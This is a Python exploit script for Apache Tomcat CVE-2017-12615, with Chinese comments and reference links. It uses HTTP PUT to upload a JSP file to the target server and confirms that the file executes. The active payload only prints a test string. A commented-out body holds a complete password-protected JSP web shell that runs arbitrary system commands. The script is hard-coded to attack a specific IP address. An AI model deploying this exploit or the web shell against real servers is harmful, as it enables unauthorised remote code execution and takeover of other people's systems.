tomcat-cve-2017-12615

'''
https://www.cnblogs.com/hookjoy/p/7567861.html #测试成功
影响版本 tomcat7.0.0-7.0.81 测试版本tomcat7.0.79
http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html
https://mp.weixin.qq.com/s?__biz=MzI1NDg4MTIxMw==&mid=2247483659&idx=1&sn=c23b3a3b3b43d70999bdbe644e79f7e5
https://mp.weixin.qq.com/s?__biz=MzU3ODAyMjg4OQ==&mid=2247483805&idx=1&sn=503a3e29165d57d3c20ced671761bb5e
'''

import requests
import uuid
from termcolor import cprint
from urllib.parse import urlparse
class Exploit:
    def attack(self, url):
        uu = uuid.uuid4()
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
            'Connection': 'close',
            'Upgrade-Insecure-Requests': '1',
        }

        # body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
        # +"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("ske".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>'''
        body = '''<%out.print("test");%>'''
        url_parse = urlparse(url)
        url = r'http://' + url if url_parse.scheme == '' else url
        put_url = r'{}/{}.jsp/'.format(url,uu)
        try:
            res = requests.put(put_url,data=body,headers=headers)
            code = res.status_code
            if code == 201:
                print('[+]access : {}'.format(put_url[:-1]))
                access_url = put_url[:-1]
                whoami = requests.get(access_url).text
                if r"test" in whoami:
                    return "[+]存在Tomcat PUT方法任意写文件漏洞（CVE-2017-12615）漏洞...(高危)	payload: " + access_url
            else:
                return None
        except Exception as e:
            cprint("[-] " + __file__ + "====>连接超时", "cyan")

print(Exploit().attack("http://169.254.121.72:8080/"))
# if __name__ == '__main__':
#     usage = r'usage : %prog python3 cve-12615.py -u http://localhost:8080'
#     parse = OptionParser(usage=usage)
#     parse.add_option('-u','--url',dest='url',type='string',help='input test url')
#     options, args = parse.parse_args()
#     attack(options.url)